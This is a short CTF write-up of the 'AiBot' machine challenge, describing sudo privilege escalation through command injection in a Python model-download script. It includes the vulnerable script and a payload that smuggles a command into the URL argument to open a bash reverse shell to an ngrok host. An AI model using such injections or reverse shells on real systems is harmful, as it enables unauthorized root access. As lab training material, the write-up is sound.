AhmedZaid
CTF Writeups
Cyber Talents
Pico CTF
THM
Home
Contact
Copyright © 2024 |
Yankos
Home
>
CTF Writeups
> Cyber Talents
Now Loading ...
Cyber Talents
AiBot
AiBot Challenges Difficulty: Medium Category: Machines WALKTHROUGH This challenge is from Cybertalant 2025 ramadan nights CTF First thing we got is a terminal with a user called ttyduser to list this user permissions use sudo -l ttyduser can run /usr/bin/python3 /opt/aiwget.py with sudo import argparse import re from paddle import utils def is_valid_url(url): regex = re.compile( r'^(?:http|ftp|https)s?://', re.IGNORECASE, ) return re.match(regex, url) is not None def is_valid_path(path): return path.startswith("/tmp") def main(): parser = argparse.ArgumentParser(description='Download AI Model.') parser.add_argument('url', type=str, help='URL to download from') parser.add_argument('path', type=str, help='Path to save the file, must start with /tmp') args parser.parse_args() if not is_valid_url(args.url): raise ValueError("The URL is not valid.") if not is_valid_path(args.path): raise ValueError("The path must start with /tmp.") utils.download._wget_download(args.url, args.path) if __name__ == '__main__': main() This script requires two arguments: url: the link to the AI Model to download path: path to save model to and must start with /tmp Takes the arguments directly from the user and passes them to _wget_download function we found a cve for utils.download._wget_download function So we tried to do so sudo /usr/bin/python3 /opt/aiwget.py "https://; sleep 10" /tmp/model and it works so lets try to get a revere shell using ngrok ngrok tcp 4444 sudo /usr/bin/python3 /opt/aiwget.py "https://; bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/14455 0>&1'" /tmp/model
CTF Writeups
· 2025-04-15
<
>
Touch background to close
AhmedZaid
